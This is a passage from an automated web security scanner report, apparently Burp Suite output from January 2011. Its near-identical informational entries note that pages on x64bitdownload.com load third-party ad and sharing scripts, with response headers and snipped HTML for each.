                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1345. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1346. http://www.x64bitdownload.com/64-bit-forum-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:32 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:58 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91001

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1347. http://www.x64bitdownload.com/64-bit-forums-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:53:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:40 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1348. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-google-groups-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:10 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22google-groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22google+groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1349. http://www.x64bitdownload.com/64-bit-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:03:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1350. http://www.x64bitdownload.com/64-bit-group-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:41 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1351. http://www.x64bitdownload.com/64-bit-groups-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-groups-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1352. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1353. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1354. http://www.x64bitdownload.com/64-bit-images-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1355. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1356. http://www.x64bitdownload.com/64-bit-internet-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1357. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1358. http://www.x64bitdownload.com/64-bit-killfile-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-killfile-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1359. http://www.x64bitdownload.com/64-bit-mp3-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</script>
                                       <script type="text/javascript"
                                       src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
                                       </script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

21.1360. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
